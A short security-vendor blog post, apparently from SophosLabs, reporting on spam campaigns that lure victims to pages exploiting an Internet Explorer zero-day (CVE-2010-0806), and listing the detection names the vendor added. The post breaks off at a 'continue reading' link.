Internet Explorer 0-day targeted in spam runs

Hot on the heels of the Patch Tuesday announcements yesterday (see blog or links to vulnerability assessment pages), came the announcement of a new zero-day in Internet Explorer (CVE-2010-0806).
Whilst checking through some URLs supposedly serving up malicious code to exploit this vulnerability, I noticed a link to some spam runs from earlier in the week. On March 8th SophosLabs saw spam messages attempting to trick the recipient into visiting rogue web pages. Messages used at least two social engineering tricks to lure victims into clicking the malicious link.

the tried and tested “delivery failed, please confirm address details” messages
request for details confirmation for insurance quote

Example messages are shown below.

In either case, clicking on the link takes the victim to a web page which kickstarts the infection process.
Generic detection for the exploit scripts seen thus far has been added as Troj/ExpJS-R. A script used to query the browser/OS version before loading the exploit script (or redirecting to a games site) has been added as Troj/JSRedir-AW.
The malicious payloads installed in such attacks are liable to change of course, but the ones seen thus far have been either proactively detected as Mal/Dropper-Y, (continue reading...)